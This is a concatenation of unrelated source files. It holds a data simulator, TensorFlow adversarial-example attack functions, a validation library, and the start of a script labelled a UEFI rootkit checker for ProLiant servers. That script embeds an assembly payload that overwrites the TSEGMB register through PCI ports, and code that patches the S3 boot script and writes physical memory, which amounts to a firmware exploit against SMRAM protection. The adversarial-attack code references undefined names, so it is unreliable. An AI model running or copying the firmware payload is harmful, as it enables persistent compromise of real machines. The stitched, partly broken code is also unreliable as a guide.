self.is_hs_built = False
def sample_data(self, N=None):
N = N if N is not None else self.n
X = np.zeros((N, self.num_nodes))
h = np.zeros((N, len(self.hidden_state_nodes)))
assert (not self.is_hs_built) or len(self.hidden_state_simulators) == len(self.hidden_state_nodes)
for h_i in range(len(self.hidden_state_nodes)):
x_index = sorted([x for x in self.ontology_simulator.T.predecessors('h%i' % h_i) if type(x) is int])
h_index = sorted(
[int(x.lstrip('h')) for x in self.ontology_simulator.T.predecessors('h%i' % h_i) if type(x) is str])
interaction_str = np.mean([self.ontology_simulator.T[x]['h%i' % h_i]['weight'] for x in
self.ontology_simulator.T.predecessors('h%i' % h_i)])
# interaction_str = 0.2
if not self.is_hs_built:
self.hidden_state_simulators.append(HiddenStateSimulator(n=self.n, x_index=x_index, h_index=h_index,
interaction_strength=interaction_str))
if h_index:
x_, y_ = self.hidden_state_simulators[h_i].sample_data(N=N, hs=h)
else:
x_, y_ = self.hidden_state_simulators[h_i].sample_data(N=N)
X[:, x_index] = x_[:, 0:(x_.shape[1] - len(h_index))]
h[:, h_i] = y_
self.is_hs_built = True
y = y_ + np.random.normal(0, np.sqrt(self.noise_var), N)
return X, y
def get_ground_truth(self, X, return_h=False):
assert self.is_hs_built
N = X.shape[0]
h = np.zeros((N, len(self.hidden_state_nodes)))
for h_i in range(len(self.hidden_state_nodes)):
x_index = sorted([x for x in self.ontology_simulator.T.predecessors('h%i' % h_i) if type(x) is int])
h_index = sorted(
[int(x.lstrip('h')) for x in self.ontology_simulator.T.predecessors('h%i' % h_i) if type(x) is str])
if h_index:
h_input = np.concatenate([X[:, x_index], h[:, h_index]], axis=1)
y_ = self.hidden_state_simulators[h_i].get_ground_truth(h_input)
else:
h_input = X[:, x_index]
y_ = self.hidden_state_simulators[h_i].get_ground_truth(h_input)
h[:, h_i] = y_
self.is_hs_built = True
y = y_
if return_h:
return y, h
else:
return y
class OntologySimulator:
def __init__(self, n, layout='spring', seed=None, sampler_kwargs=None):
"""
Args:
n: number of nodes/Xs
layout:
seed:
Examples:
from BioNAS.utils.simulator import OntologySimulator, HiddenStateSimulator
ot = OntologySimulator(20, seed=1710)
ot.draw('ontology_graph.pdf')
x,y =ot.sampler.sample_data(1000)
x_,y_ =ot.sampler.sample_data(100)
from sklearn.linear_model import LinearRegression
lm = LinearRegression().fit(x, y)
print(lm.score(x_, y_)) # test r2=0.505
"""
import networkx as nx
self.n = n
self.seed = seed
self.backend = nx
if layout == 'spring':
self.layout_ = nx.spring_layout
elif layout == 'graphviz':
self.layout_ = lambda g: nx.drawing.nx_agraph.graphviz_layout(g, prog='dot')
else:
raise Exception('cannot understand layout: %s' % layout)
self.G = nx.generators.random_graphs.powerlaw_cluster_graph(n, m=1, p=0., seed=seed)
self.set_weights()
self._build_tree()
if sampler_kwargs is None:
sampler_kwargs = {'n': 1000, 'noise_var': 0.1}
self.sampler = _OntologyPolynomial(self, **sampler_kwargs)
@property
def adjacency_matrix(self):
return self.backend.adjacency_matrix(self.G).todense()
def set_weights(self):
np.random.seed(self.seed)
for e in self.G.edges():
self.G[e[0]][e[1]]['weight'] = np.random.uniform(0.1, 1)
def _build_tree(self):
"""
TODO: still cannot convert G weights to T weights
"""
G = self.G
e_G = sorted([e for e in G.edges(data=True)], key=lambda x: x[-1]['weight'], reverse=True)
e_T = []
cutoffs = [0.7, 0.4, 0.1]
hidden_states_dict = {}
h_count = 0
for cutoff in cutoffs:
sg = self.backend.Graph([e for e in e_G if e[-1]['weight'] >= cutoff])
for cc in self.backend.connected_components(sg):
| |
<reponame>haiphanNJIT/StoBatch<filename>CIFAR10/more_attack.py
import numpy as np
from six.moves import xrange
import tensorflow as tf
from cleverhans.attacks_tf import fgm, fgsm
from build_utils import batch_adv
def model_loss(y, model, mean=True):
"""
FROM cleverhans/utils_tf
Define loss of TF graph
:param y: correct labels
:param model: output of the model
:param mean: boolean indicating whether should return mean of loss
or vector of losses for each input of the batch
:return: return mean of loss if True, otherwise return vector with per
sample loss
"""
op = model.op
if "softmax" in str(op).lower():
logits, = op.inputs
else:
logits = model
out = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y)
if mean:
out = tf.reduce_mean(out)
return out
def fgm_pre_computed_grad(x, grad, eps=0.3, ord=np.inf,
clip_min=None, clip_max=None,
targeted=False):
"""
TensorFlow implementation of the Fast Gradient Method using pre computed gradients.
:param x: input
:param grad: pre-computed gradients for x on the pre-trained model
(use negative (flipped) loss for the gradient if targeted)
:param eps: the epsilon (input variation parameter)
:param ord: (optional) Order of the norm (mimics NumPy).
Possible values: np.inf, 1 or 2.
:param clip_min: Minimum float value for adversarial example components
:param clip_max: Maximum float value for adversarial example components
:param targeted: Is the attack targeted or untargeted? Untargeted, the
default, will try to make the label incorrect. Targeted
will instead try to move in the direction of being more
like y.
:return: a tensor for the adversarial example
"""
if ord == np.inf:
# Take sign of gradient
normalized_grad = tf.sign(grad)
# The following line should not change the numerical results.
# It applies only because `normalized_grad` is the output of
# a `sign` op, which has zero derivative anyway.
# It should not be applied for the other norms, where the
# perturbation has a non-zero derivative.
normalized_grad = tf.stop_gradient(normalized_grad)
elif ord == 1:
red_ind = list(xrange(1, len(x.get_shape())))
normalized_grad = grad / tf.reduce_sum(tf.abs(grad),
reduction_indices=red_ind,
keep_dims=True)
elif ord == 2:
red_ind = list(xrange(1, len(x.get_shape())))
square = tf.reduce_sum(tf.square(grad),
reduction_indices=red_ind,
keep_dims=True)
normalized_grad = grad / tf.sqrt(square)
else:
raise NotImplementedError("Only L-inf, L1 and L2 norms are "
"currently implemented.")
# Multiply by constant epsilon
scaled_grad = eps * normalized_grad
# Add perturbation to original example to obtain adversarial example
adv_x = x + scaled_grad
# If clipping is needed, reset all values outside of [clip_min, clip_max]
if (clip_min is not None) and (clip_max is not None):
adv_x = tf.clip_by_value(adv_x, clip_min, clip_max)
return adv_x
def rand_fgm(sess, x, logits, y=None, eps=0.3, ord=np.inf, rand_eps=0.3, rand_alpha=0.05,
clip_min=None, clip_max=None,
targeted=False):
"""
TensorFlow implementation of the Fast Gradient Method.
:param x: the input placeholder
:param preds: the model's output tensor (the attack expects the
probabilities, i.e., the output of the softmax)
:param y: (optional) A placeholder for the model labels. If targeted
is true, then provide the target label. Otherwise, only provide
this parameter if you'd like to use true labels when crafting
adversarial samples. Otherwise, model predictions are used as
labels to avoid the "label leaking" effect (explained in this
paper: https://arxiv.org/abs/1611.01236). Default is None.
Labels should be one-hot-encoded.
:param eps: the epsilon (input variation parameter)
:param ord: (optional) Order of the norm (mimics NumPy).
Possible values: np.inf, 1 or 2.
:param clip_min: Minimum float value for adversarial example components
:param clip_max: Maximum float value for adversarial example components
:param targeted: Is the attack targeted or untargeted? Untargeted, the
default, will try to make the label incorrect. Targeted
will instead try to move in the direction of being more
like y.
:return: a tensor for the adversarial example
"""
x_rand = x + rand_alpha * tf.sign(tf.random_normal(shape=tf.get_shape(x), mean=0.0, stddev=1.0))
if y is None:
# Using model predictions as ground truth to avoid label leaking
preds_max = tf.reduce_max(preds, 1, keep_dims=True)
y = tf.to_float(tf.equal(preds, preds_max))
y = tf.stop_gradient(y)
y = y / tf.reduce_sum(y, 1, keep_dims=True)
# Compute loss
loss = utils_tf.model_loss(y, preds, mean=False)
if targeted:
loss = -loss
# Define gradient of loss wrt input
grad, = tf.gradients(loss, x)
if ord == np.inf:
# Take sign of gradient
normalized_grad = tf.sign(grad)
# The following line should not change the numerical results.
# It applies only because `normalized_grad` is the output of
# a `sign` op, which has zero derivative anyway.
# It should not be applied for the other norms, where the
# perturbation has a non-zero derivative.
normalized_grad = tf.stop_gradient(normalized_grad)
elif ord == 1:
red_ind = list(xrange(1, len(x.get_shape())))
normalized_grad = grad / tf.reduce_sum(tf.abs(grad),
reduction_indices=red_ind,
keep_dims=True)
elif ord == 2:
red_ind = list(xrange(1, len(x.get_shape())))
square = tf.reduce_sum(tf.square(grad),
reduction_indices=red_ind,
keep_dims=True)
normalized_grad = grad / tf.sqrt(square)
else:
raise NotImplementedError("Only L-inf, L1 and L2 norms are "
"currently implemented.")
# Multiply by constant epsilon
scaled_grad = eps * normalized_grad
# Add perturbation to original example to obtain adversarial example
adv_x = x + scaled_grad
# If clipping is needed, reset all values outside of [clip_min, clip_max]
if (clip_min is not None) and (clip_max is not None):
adv_x = tf.clip_by_value(adv_x, clip_min, clip_max)
return adv_x
def iter_fgsm(sess, x_input_t, labels_t, x_input, labels, batch_size,
preds_t, target_labels_t,
steps, total_eps, step_eps,
clip_min=0.0, clip_max=1.0,
ord=np.inf, targeted=False):
"""
I-FGSM attack. This function directly generate adv inputs
"""
eta_t = fgm(x_input_t, preds_t, y=target_labels_t, eps=step_eps, ord=ord,
clip_min=clip_min, clip_max=clip_max, targeted=targeted) - x_input_t
if ord == np.inf:
eta_t = tf.clip_by_value(eta_t, -total_eps, total_eps)
elif ord in [1, 2]:
reduc_ind = list(xrange(1, len(tf.shape(eta_t))))
if ord == 1:
norm = tf.reduce_sum(tf.abs(eta_t),
reduction_indices=reduc_ind,
keep_dims=True)
elif ord == 2:
norm = tf.sqrt(tf.reduce_sum(tf.square(eta_t),
reduction_indices=reduc_ind,
keep_dims=True))
eta_t = eta_t * total_eps / norm
x_adv_t = x_input_t + eta_t
x_adv = x_input
for i in range(steps):
x_adv = batch_adv(sess, x_adv_t, x_input_t, labels_t, x_adv, labels, batch_size)
return adv_x
def iter_fgsm_t(x_input_t, preds_t, target_labels_t,
steps, total_eps, step_eps,
clip_min=0.0, clip_max=1.0, ord=np.inf, targeted=False):
"""
I-FGSM attack.
"""
eta_t = fgm(x_input_t, preds_t, y=target_labels_t, eps=step_eps, ord=ord,
clip_min=clip_min, clip_max=clip_max, targeted=targeted) - x_input_t
if ord == np.inf:
eta_t = tf.clip_by_value(eta_t, -total_eps, total_eps)
elif ord in [1, 2]:
reduc_ind = list(xrange(1, len(tf.shape(eta_t))))
if ord == 1:
norm = tf.reduce_sum(tf.abs(eta_t),
reduction_indices=reduc_ind,
keep_dims=True)
elif ord == 2:
norm = tf.sqrt(tf.reduce_sum(tf.square(eta_t),
reduction_indices=reduc_ind,
keep_dims=True))
eta_t = eta_t * total_eps / norm
x_adv_t = x_input_t + eta_t
return x_adv_t
def _fgm(x, preds, y=None, eps=0.3, ord=np.inf,
clip_min=None, clip_max=None,
targeted=False):
"""
TensorFlow implementation of the Fast Gradient Method.
:param x: the input placeholder
:param preds: the model's output tensor (the attack expects the
probabilities, i.e., the output of the softmax)
:param y: (optional) A placeholder for the model labels. If targeted
is true, then provide the target label. Otherwise, only provide
this parameter if you'd like to use true labels when crafting
adversarial samples. Otherwise, model predictions are used as
labels to avoid the "label leaking" effect (explained in this
paper: https://arxiv.org/abs/1611.01236). Default is None.
Labels should be one-hot-encoded.
:param eps: the epsilon (input variation parameter)
:param ord: (optional) Order of the norm (mimics NumPy).
Possible values: np.inf, 1 or 2.
:param clip_min: Minimum float value for adversarial example components
:param clip_max: Maximum float value for adversarial example components
:param targeted: Is the attack targeted or untargeted? Untargeted, the
default, will try to make the label incorrect. Targeted
will instead try to move in the direction of being more
like y.
:return: a tensor for the adversarial example
"""
if y is None:
# Using model predictions as ground truth to avoid label leaking
preds_max = tf.reduce_max(preds, 1, keep_dims=True)
y = tf.to_float(tf.equal(preds, preds_max))
y = tf.stop_gradient(y)
y = y / tf.reduce_sum(y, 1, keep_dims=True)
# Compute loss
loss = utils_tf.model_loss(y, preds, mean=False)
if targeted:
loss = -loss
# Define gradient of loss wrt input
grad, = tf.gradients(loss, x)
if ord == np.inf:
# Take sign of gradient
normalized_grad = tf.sign(grad)
# The following line should not change the numerical results.
# It applies only because `normalized_grad` is the output of
# a `sign` op, which has zero derivative anyway.
# It should not be applied for the other norms, where the
# perturbation has a non-zero derivative.
normalized_grad = tf.stop_gradient(normalized_grad)
elif ord == 1:
red_ind = list(xrange(1, len(x.get_shape())))
normalized_grad = grad / tf.reduce_sum(tf.abs(grad),
reduction_indices=red_ind,
keep_dims=True)
elif | |
from results.
itervalues = getattr(differences, 'itervalues', differences.values)()
filtered = (x for _, x in itervalues if x is not NOVALUE)
description = next(filtered, None)
# Format dictionary values and finalize description.
for key, value in IterItems(differences):
diffs, desc = value
differences[key] = diffs
if description and description != desc and desc is not NOVALUE:
description = None
return differences, description
def whole_requirement(func):
"""A decorator for whole requirement functions. A whole requirement
function should accept a *data* object and return values appropriate
for instantiating a :exc:`ValidationError` (either an iterable of
differences or a 2-tuple containing an iterable of differences and
a description).
"""
if getattr(func, '_whole_requirement', False):
return func # <- EXIT!
func._whole_requirement = True
return func
@wraps(func)
def wrapper(data):
result = func(data)
return _normalize_requirement_result(result, func)
wrapper._whole_requirement = True
return wrapper
def requirement_handler(requirement):
"""Returns a while requirement function that provides default
validation behavior.
"""
@whole_requirement
def _requirement_handler(data):
"""Default requirement handler."""
if isinstance(requirement, Mapping):
result = _datadict_vs_requirementdict(data, requirement)
elif isinstance(data, (Mapping, IterItems)):
result = _datadict_vs_requirement(data, requirement)
else:
result = _data_vs_requirement(data, requirement)
return result
return _requirement_handler
def _get_required_func(requirement):
"""Returns a whole-object requirement handler."""
if getattr(requirement, '_whole_requirement', False):
return requirement
return requirement_handler(requirement)
##############################
# Abstract Requirement Classes
##############################
class BaseRequirement(abc.ABC):
"""A class to check that the data fulfills a specific need
or expectation. All requirement classes must inherit from
BaseRequirement.
"""
@abc.abstractmethod
def check_data(self, data):
raise NotImplementedError()
def _verify_difference(self, obj):
"""Raise an error if *obj* is not a subclass of BaseDifference."""
if not isinstance(obj, BaseDifference):
slf_name = self.__class__.__name__
obj_name = obj.__class__.__name__
message = ('values returned from {0} must be '
'difference objects, got {1}: {2!r}')
raise TypeError(message.format(slf_name, obj_name, obj))
def _wrap_difference_group(self, group):
"""A generator function to wrap an iterable of differences and
verify that each value is a difference object.
"""
for value in group:
self._verify_difference(value)
yield value
def _wrap_difference_items(self, items):
"""A generator function to wrap an iterable of key/value pairs
and verify that each value is a difference or an iterable of
difference objects.
"""
for key, value in items:
if nonstringiter(value):
value = self._wrap_difference_group(value)
else:
self._verify_difference(value)
yield key, value
def _normalize(self, result):
"""Return a normalized *result* as a 2-tuple (containing an
iterable of differences and a string description) or None.
"""
if (isinstance(result, Sequence)
and len(result) == 2
and not isinstance(result[1], BaseDifference)):
differences, description = result
else:
differences = result
description = ''
if not description:
description = 'does not satisfy {0}'.format(self.__class__.__name__)
if not isinstance(differences, Iterable):
slf_name = self.__class__.__name__
dff_name = differences.__class__.__name__
message = (
'{0!r} should return an iterable or a tuple containing '
'an iterable and a string description, got {1!r}: {2!r}'
)
raise TypeError(message.format(slf_name, dff_name, differences))
first_item, differences = iterpeek(differences, NOVALUE)
if first_item is NOVALUE:
return None # <- EXIT!
if isinstance(first_item, tuple):
differences = self._wrap_difference_items(differences)
else:
differences = self._wrap_difference_group(differences)
return differences, description
def __call__(self, data):
result = self.check_data(data)
return self._normalize(result)
class ItemsRequirement(BaseRequirement):
"""A class to check that items or mappings of data fulfill a
specific need or expectation.
"""
@abc.abstractmethod
def check_items(self, items):
raise NotImplementedError()
def check_data(self, data):
data = normalize(data, lazy_evaluation=True)
if isinstance(data, Mapping):
data = IterItems(data)
return self.check_items(data)
_INCONSISTENT = object() # Marker for inconsistent descriptions.
class GroupRequirement(BaseRequirement):
"""A class to check that groups of data fulfill a specific need
or expectation.
"""
@abc.abstractmethod
def check_group(self, group):
raise NotImplementedError()
def check_items(self, items, autowrap=True):
differences = []
description = ''
check_group = self.check_group
for key, value in items:
if isinstance(value, BaseElement) and autowrap:
value = [value] # Wrap element to treat it as a group.
diff, desc = check_group(value)
diff = list(diff)
if len(diff) == 1:
diff = diff[0] # Unwrap if single difference.
if not diff:
continue
else:
diff, desc = check_group(value)
first_element, diff = iterpeek(diff, None)
if not first_element:
continue
differences.append((key, diff))
if description == desc or description is _INCONSISTENT:
continue
if not description:
description = desc
else:
description = _INCONSISTENT
if description is _INCONSISTENT:
description = ''
return differences, description
def check_data(self, data):
data = normalize(data, lazy_evaluation=True)
if isinstance(data, Mapping):
data = IterItems(data)
if isinstance(data, IterItems):
return self.check_items(data)
if isinstance(data, BaseElement):
data = [data]
return self.check_group(data)
##############################
# Concrete Requirement Classes
##############################
class RequiredPredicate(GroupRequirement):
"""A requirement to test data for predicate matches."""
def __init__(self, obj, show_expected=False):
self._pred = self.predicate_factory(obj)
self._obj = obj
self.show_expected = show_expected
def predicate_factory(self, obj):
if isinstance(obj, Predicate):
return obj
return Predicate(obj)
def _get_differences(self, group):
pred = self._pred
obj = self._obj
show_expected = self.show_expected
for element in group:
result = pred(element)
if not result:
yield _make_difference(element, obj, show_expected)
elif isinstance(result, BaseDifference):
yield result
def check_group(self, group):
differences = self._get_differences(group)
description = _build_description(self._obj)
return differences, description
def check_items(self, items):
if self.__class__ is not RequiredPredicate:
return super(RequiredPredicate, self).check_items(items)
pred = self._pred
obj = self._obj
show_expected = self.show_expected
check_group = self.check_group
differences = []
for key, value in items:
if isinstance(value, BaseElement):
result = pred(value)
if not result:
diff = _make_difference(value, obj, show_expected)
elif isinstance(result, BaseDifference):
diff = result
else:
continue
else:
diff, desc = check_group(value)
first_element, diff = iterpeek(diff, None)
if not first_element:
continue
differences.append((key, diff))
description = _build_description(obj)
return differences, description
class RequiredApprox(RequiredPredicate):
"""Require that numeric values are approximately equal.
Values compare as equal if their difference rounded to the
given number of decimal places (default 7) equals zero, or
if the difference between values is less than or equal to
the given delta.
"""
def __init__(self, obj, places=None, delta=None, show_expected=False):
if places is None:
places = 7
self.places = places
self.delta = delta
super(RequiredApprox, self).__init__(obj, show_expected=show_expected)
@staticmethod
def approx_delta(delta, value, other):
try:
return abs(other - value) <= delta
except TypeError:
return False
@staticmethod
def approx_places(places, value, other):
try:
return round(abs(other - value), places) == 0
except TypeError:
return False
def predicate_factory(self, obj):
"""Return Predicate object where string components have been
replaced with approx_delta() or approx_delta() function.
"""
delta = self.delta
if delta is not None:
approx_equal = partial(self.approx_delta, delta)
else:
approx_equal = partial(self.approx_places, self.places)
def approx_or_orig(x):
if isinstance(x, Number):
return partial(approx_equal, x)
return x
if isinstance(obj, tuple):
return Predicate(tuple(approx_or_orig(x) for x in obj))
return Predicate(approx_or_orig(obj))
def _get_description(self):
if self.delta is not None:
return 'not equal within delta of {0}'.format(self.delta)
return 'not equal within {0} decimal places'.format(self.places)
def check_group(self, group):
differences, _ = super(RequiredApprox, self).check_group(group)
return differences, self._get_description()
class RequiredFuzzy(RequiredPredicate):
"""Require that strings match with a similarity greater than
or equal to *cutoff* (default 0.6).
Similarity measures are determined using the ratio() method
of the difflib.SequenceMatcher class. The values range from
1.0 (exactly the same) to 0.0 (completely different).
"""
def __init__(self, obj, cutoff=0.6, show_expected=False):
self.cutoff = cutoff
super(RequiredFuzzy, self).__init__(obj, show_expected=show_expected)
def predicate_factory(self, obj):
"""Return Predicate object where string components have been
replaced with fuzzy_match() function.
"""
cutoff = self.cutoff
def fuzzy_match(cutoff, a, b):
try:
matcher = difflib.SequenceMatcher(a=a, b=b)
return matcher.ratio() >= cutoff
except TypeError:
return False
def fuzzy_or_orig(a):
if isinstance(a, string_types):
return partial(fuzzy_match, cutoff, a)
return a
if isinstance(obj, tuple):
return Predicate(tuple(fuzzy_or_orig(x) for x in obj))
return Predicate(fuzzy_or_orig(obj))
def check_group(self, group):
differences, description = super(RequiredFuzzy, self).check_group(group)
fuzzy_info = '{0}, fuzzy matching at ratio {1} or greater'
description = fuzzy_info.format(description, self.cutoff)
return differences, description
class RequiredInterval(RequiredPredicate):
"""Require that values are within given interval."""
def __init__(self, min=None, max=None, show_expected=False):
left_bounded = min is not None
right_bounded = max is not None
if left_bounded and right_bounded:
if max < min:
raise ValueError("'max' must not be less than 'min'")
def interval(element):
try:
if element < min:
return _make_difference(element, min, show_expected)
if element > max:
return _make_difference(element, max, show_expected)
except TypeError:
return Invalid(element)
return True
description = 'elements `x` do not satisfy `{0!r} <= x <= {1!r}`'
description = description.format(min, max)
elif left_bounded:
def interval(element):
try:
if element < min:
return _make_difference(element, min, show_expected)
except TypeError:
return Invalid(element)
return True
description = 'less than minimum expected value of {0!r}'.format(min)
elif right_bounded:
def interval(element):
try:
if element > max:
return _make_difference(element, max, show_expected)
except TypeError:
return Invalid(element)
return True
description = 'exceeds maximum expected value of {0!r}'.format(max)
else:
raise TypeError("must provide at least one: 'min' or 'max'")
self._description = description
super(RequiredInterval, self).__init__(interval, show_expected=show_expected)
| |
<reponame>evgind/lojax_uefi_rootkit_checker
#!/usr/bin/env python3
#<EMAIL> V0.1
#This script performs firmware checks for only ProLiant DL180 and ProLiant DL360.
import sys, os, argparse, subprocess, re, pkg_resources, json, contextlib, time
from struct import pack, unpack
_BaseModule = 'BaseModule'
PAYLOAD = '''
[bits 32]
; save registers
push eax
push edx
push esi
call _label
db 0ffh
dd 0 ; shellcode say
db 0 ; BIOS_CNTL degeri
dd 0 ; TSEGMB degeri
_label:
pop esi
inc esi
inc dword [esi]
cmp byte [esi], 1
jne _end
mov eax, 0x8000f8dc
mov dx, 0xcf8
out dx, eax
mov dx, 0xcfc
in al, dx
mov byte [esi + 4], al
mov eax, 0x800000b8
mov dx, 0xcf8
out dx, eax
mov dx, 0xcfc
in eax, dx
mov dword [esi + 5], eax
and eax, 1
test eax, eax
jnz _end
; bus = 0, dev = 0, func = 0, offset = 0xb8
mov eax, 0x800000b8
mov dx, 0xcf8
out dx, eax
; TSEGMB dummy deger yaz
mov eax, 0xff000001
mov dx, 0xcfc
out dx, eax
_end:
; registerleri geri yukle
pop esi
pop edx
pop eax
'''
def _at(data, off, size, fmt): return unpack(fmt, data[off : off + size])[0]
def byte_at(data, off = 0): return _at(data, off, 1, 'B')
def word_at(data, off = 0): return _at(data, off, 2, 'H')
def dword_at(data, off = 0): return _at(data, off, 4, 'I')
def qword_at(data, off = 0): return _at(data, off, 8, 'Q')
class UefiParser(object):
BOOT_SCRIPT_EDK_SIGN = '\xAA'
BOOT_SCRIPT_EDK_HEADER_LEN = 0x34
EFI_BOOT_SCRIPT_IO_WRITE_OPCODE = 0x00
EFI_BOOT_SCRIPT_IO_READ_WRITE_OPCODE = 0x01
EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE = 0x02
EFI_BOOT_SCRIPT_MEM_READ_WRITE_OPCODE = 0x03
EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE = 0x04
EFI_BOOT_SCRIPT_PCI_CONFIG_READ_WRITE_OPCODE = 0x05
EFI_BOOT_SCRIPT_SMBUS_EXECUTE_OPCODE = 0x06
EFI_BOOT_SCRIPT_STALL_OPCODE = 0x07
EFI_BOOT_SCRIPT_DISPATCH_OPCODE = 0x08
EFI_BOOT_SCRIPT_MEM_POLL_OPCODE = 0x09
boot_script_ops = [
'IO_WRITE',
'IO_READ_WRITE',
'MEM_WRITE',
'MEM_READ_WRITE',
'PCI_CONFIG_WRITE',
'PCI_CONFIG_READ_WRITE',
'SMBUS_EXECUTE',
'STALL',
'DISPATCH',
'EFI_BOOT_SCRIPT_MEM_POLL_OPCODE' ]
EfiBootScriptWidthUint8 = 0
EfiBootScriptWidthUint16 = 1
EfiBootScriptWidthUint32 = 2
EfiBootScriptWidthUint64 = 3
EfiBootScriptWidthFifoUint8 = 4
EfiBootScriptWidthFifoUint16 = 5
EfiBootScriptWidthFifoUint32 = 6
EfiBootScriptWidthFifoUint64 = 7
EfiBootScriptWidthFillUint8 = 8
EfiBootScriptWidthFillUint16 = 9
EfiBootScriptWidthFillUint32 = 10
EfiBootScriptWidthFillUint64 = 11
boot_script_width = [
'Uint8',
'Uint16',
'Uint32',
'Uint64',
'FifoUint8',
'FifoUint16',
'FifoUint32',
'FifoUint64',
'FillUint8',
'FillUint16',
'FillUint32',
'FillUint64' ]
def __init__(self, quiet = False):
self.quiet = quiet
def value_at(self, data, off, width):
if width == self.EfiBootScriptWidthUint8: return byte_at(data, off)
elif width == self.EfiBootScriptWidthUint16: return word_at(data, off)
elif width == self.EfiBootScriptWidthUint32: return dword_at(data, off)
elif width == self.EfiBootScriptWidthUint64: return qword_at(data, off)
else: raise Exception('Invalid width 0x%x' % width)
def width_size(self, width):
if width == self.EfiBootScriptWidthUint8: return 1
elif width == self.EfiBootScriptWidthUint16: return 2
elif width == self.EfiBootScriptWidthUint32: return 4
elif width == self.EfiBootScriptWidthUint64: return 8
else: raise Exception('Invalid width 0x%x' % width)
def memory_write_proc(self, width, addr, count, val):
self.log(('Width: %s, Addr: 0x%.16x, Count: %d\n' + \
'Value: %s\n') % \
(self.boot_script_width[width], addr, count, \
', '.join(map(lambda v: hex(v), val))))
def pci_write(self, width, bus, dev, fun, off, count, val):
self.log(('Width: %s, Count: %d\n' + \
'Bus: 0x%.2x, Device: 0x%.2x, Function: 0x%.2x, Offset: 0x%.2x\n' + \
'Value: %s\n') % \
(self.boot_script_width[width], count, bus, dev, fun, off, \
', '.join(map(lambda v: hex(v), val))))
def io_write_proc(self, width, port, count, val):
self.log(('Width: %s, Port: 0x%.4x, Count: %d\n' + \
'Value: %s\n') % \
(self.boot_script_width[width], port, count, \
', '.join(map(lambda v: hex(v), val))))
def process_dispatch(self, addr):
self.log('Call addr: 0x%.16x' % (addr) + '\n')
def read_values(self, data, width, count):
values = []
for i in range(0, count):
# read single value of given width
values.append(self.value_at(data, i * self.width_size(width), width))
return values
def op_name(self, op):
if op < len(self.boot_script_ops):
return self.boot_script_ops[op]
else:
return 'UNKNOWN_0x%X' % op
def parse_intel(self, data, boot_script_addr):
ptr = 0
while data:
num, size, op = unpack('IIB', data[:9])
if op == 0xff:
self.log('# End of the boot script at offset 0x%x' % ptr)
break
elif op >= len(self.boot_script_ops):
raise Exception('Invalid op 0x%x' % op)
self.log('#%d len=%d %s' % (num, size, self.op_name(op)))
if op == self.EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE:
width, count = byte_at(data, 9), qword_at(data, 24)
addr = qword_at(data, 16)
values = self.read_values(data[32:], width, count)
self.memory_write_proc(width, addr, count, values)
elif op == self.EFI_BOOT_SCRIPT_PCI_CONFIG_WRITE_OPCODE:
width, count = byte_at(data, 9), qword_at(data, 24)
addr = qword_at(data, 16)
bus, dev, fun, off = (addr >> 24) & 0xff, (addr >> 16) & 0xff, \
(addr >> 8) & 0xff, (addr >> 0) & 0xff
values = self.read_values(data[32:], width, count)
self.pci_write(width, bus, dev, fun, off, count, values)
elif op == self.EFI_BOOT_SCRIPT_IO_WRITE_OPCODE:
width, count = byte_at(data, 9), qword_at(data, 16)
port = word_at(data, 10)
values = self.read_values(data[24:], width, count)
self.io_write_proc(width, port, count, values)
elif op == self.EFI_BOOT_SCRIPT_DISPATCH_OPCODE:
addr = qword_at(data, 16)
self.process_dispatch(addr)
else:
pass
data = data[size:]
ptr += size
def parse_edk(self, data, boot_script_addr):
ptr = num = 0
while data:
op, _, size = unpack('BBB', data[:3])
if op == 0xff:
self.log('# End of the boot script at offset 0x%x' % ptr)
break
if op < len(self.boot_script_ops):
name = self.boot_script_ops[op]
self.log('#%d len=%d %s' % (num, size, self.op_name(op)))
if op == self.EFI_BOOT_SCRIPT_DISPATCH_OPCODE:
addr = qword_at(data, 3)
self.process_dispatch(addr)
else:
pass
data = data[size:]
ptr += size
num += 1
def parse(self, data, boot_script_addr):
if data[0] == self.BOOT_SCRIPT_EDK_SIGN:
# parse EDK formati
self.parse_edk(data[1 + self.BOOT_SCRIPT_EDK_HEADER_LEN:], boot_script_addr)
else:
# parse Intel formati
self.parse_intel(data, boot_script_addr)
class Uefi_Parser_Table(object):
EFI_VAR_NAME = 'AcpiGlobalVariable'
EFI_VAR_GUID = 'af9ffd67-ec10-488a-9dfc-6cbf5ee22c2e'
JUMP_32_LEN = 5
JUMP_64_LEN = 14
WAKE_AFTER = 10 # saniye
BOOT_SCRIPT_OFFSET = 0x18
BOOT_SCRIPT_MAX_LEN = 0x8000
class CustomUefiParser(UefiParser):
class AddressFound(Exception):
def __init__(self, addr):
self.addr = addr
def process_dispatch(self, addr):
raise self.AddressFound(addr)
def parse(self, data, boot_script_addr):
try:
UefiParser.parse(self, data, \
boot_script_addr = boot_script_addr)
except self.AddressFound as e:
return e.addr
return None
def _efi_var_read(self, name, guid):
data = self._uefi.get_EFI_variable(name, guid, None)
if len(data) == 4:
return dword_at(data)
elif len(data) == 8:
return qword_at(data)
def _mem_read(self, addr, size):
# memory reads by 1000h
read_addr = addr & 0xfffffffffffff000
read_size = size + addr - read_addr
if hasattr(self._memory, 'read_phys_mem'):
data = self._memory.read_phys_mem(read_addr, read_size)
elif hasattr(self._memory, 'read_physical_mem'):
# for older versions
data = self._memory.read_physical_mem(read_addr, read_size)
else:
assert False
return data[addr - read_addr:]
def _mem_write(self, addr, data):
if hasattr(self._memory, 'write_phys_mem'):
self._memory.write_phys_mem(addr, len(data), data)
elif hasattr(self._memory, 'write_physical_mem'):
self._memory.write_physical_mem(addr, len(data), data)
else:
assert False
def _disasm(self, data):
import capstone
dis = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
dis.detail = True
for insn in dis.disasm(data, len(data)):
if insn.group(capstone.CS_GRP_JUMP) or \
insn.group(capstone.CS_GRP_CALL) or \
insn.group(capstone.CS_GRP_RET) or \
insn.group(capstone.CS_GRP_INT) or \
insn.group(capstone.CS_GRP_IRET):
raise Exception('Unable to patch %s instruction at the beginning of the function' % insn.mnemonic)
return insn.size
def _jump_32(self, src, dst):
addr = pack('I', (dst - src - self.JUMP_32_LEN) & 0xffffffff)
return '\xe9' + addr
def _jump_64(self, src, dst):
addr = pack('Q', dst & 0xffffffffffffffff)
return '\xff\x25\x00\x00\x00\x00' + addr
def _find_zero_bytes(self, addr, size):
